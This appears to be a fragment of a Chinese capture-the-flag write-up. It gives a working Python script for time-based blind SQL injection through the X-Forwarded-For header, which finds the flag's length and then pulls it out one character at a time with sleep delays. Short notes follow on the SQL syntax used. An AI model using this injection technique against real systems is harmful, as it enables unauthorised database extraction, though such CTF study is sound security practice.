代码如下
import requests
payload = "(select group_concat(flag) from flag)"
def getlen(payload):
payload_length = "'+ (select case when length(%s)>%d then sleep(2) end)); -- '"
maxv = 300
minv = 0
while True:
mid = (maxv+minv)/2
rq = requests.get("http://123.206.87.240:8002/web15/",headers={"X-Forwarded-For":payload_length%(payload,mid)})
if rq.elapsed.seconds >= 2:
minv = mid
else:
maxv = mid
if (maxv-minv) in [0,1]:
break
print "[+] The length is %d"%maxv
return maxv
def getchar(payload,length):
payload_ascii = "'+ (select case when ord(substr(%s from %d for 1))=%d then sleep(2) end)); -- '"
result = ''
for i in range(length):
for char in range(32,127):
rq = requests.get("http://123.206.87.240:8002/web15/",headers={"X-Forwarded-For":payload_ascii%(payload,i+1,char)})
if rq.elapsed.seconds >= 2:
result += chr(char)
print result+('.'*(length-i-1))
break
print "[+] The char is %s"%result
leng = getlen(payload)
getchar(payload, leng)
知识点
- substr(‘abc’ from 1 for 1)
- select case when 表达式 then 表达式 end 等价于IF(表达式,TRUE,False)
- like关键字不区分大小写且匹配时需要处理%,_。并且在本题中还不能出现,符号。